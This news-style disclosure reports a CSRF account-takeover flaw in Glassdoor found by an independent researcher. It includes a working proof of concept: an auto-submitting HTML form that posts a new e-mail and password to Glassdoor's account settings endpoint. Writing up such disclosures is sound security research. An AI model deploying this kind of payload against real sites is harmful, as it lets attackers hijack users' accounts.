Glassdoor Account Take-Over CSRF Vulnerability
Mohamed M. Fouad, an independent security researcher from Egypt, has discovered serious flaws in Glassdoor, the Sausalito, California based site for anonymous company reviews. Mohamed, who has a proven track record in security research and vulnerability pentesting, has been acknowledged by top tech firms including Microsoft, Oracle, Yahoo, eBay, Sony, AT&T, Huawei, DropCam, Bitcasa, Get Pocket and Splitwise. Recently his article about CSRF vulnerabilities in Booking.com was published on Techworm and was acknowledged by the company.
While researching the Glassdoor website, Mohamed found that it is vulnerable to critical account hijacking via a CSRF flaw. Mohamed says that a potential hacker can take over the website via account takeover and use it to deface the Glassdoor website as well as add new content which can lead users to a new page laden with malware. An attacker can also change any detail in the user's account settings, and this is the most critical point of this article: the user's password and e-mail address can be changed with just one click on a malicious URL, because the settings endpoint accepts a cross-site POST carrying the victim's session cookie and requires no anti-CSRF token.
Glassdoor is an American website where current and former employees anonymously review companies and their management. Last year almost 500,000 companies were reviewed by anonymous reviewers on Glassdoor. Glassdoor was launched in 2008, and its ratings of CEOs and workplaces, collated from these reviews, are widely reported and regarded as a benchmarking tool for job offers.
Proof of Concept (PoC)
Change Email Address and Password CSRF:
<!-- PoC as published: a page on an attacker-controlled site that makes the victim's browser POST to the
     Glassdoor settings endpoint. The browser attaches the victim's session cookie; no anti-CSRF token is checked.
     The e-mail and password values appear redacted in the published write-up and are left as shown. -->
<form action="https://www.glassdoor.com/member/account/settings_execute.htm" method="post" name="csrf">
<input type="hidden" name="selTabIndex" value="1">
<input type="hidden" name="emailAddress" value="[email protected]">
<input type="hidden" name="birthYear" value="">
<input type="hidden" name="race" value="">
<input type="hidden" name="highestEducation" value="">
<input type="hidden" name="newPassword" value="[email protected]">
<input type="hidden" name="confirmPassword" value="[email protected]">
<input type="submit" value="Submit">
</form>
<!-- The write-up describes a one-click URL; auto-submitting on load removes even that click. -->
<script>document.csrf.submit();</script>
Video of the PoC
Mohamed has also put up a video detailing the vulnerabilities in Glassdoor, which you can see below.
Mohamed specializes in job websites because they are the ones visited by millions of job seekers across the world every day. Most of the vulnerabilities found by Mohamed have been accepted by the companies concerned, which have paid him bug bounty awards, but unfortunately Glassdoor has not acknowledged the above vulnerability as yet.
Resource: Mohamed M. Fouad's Blog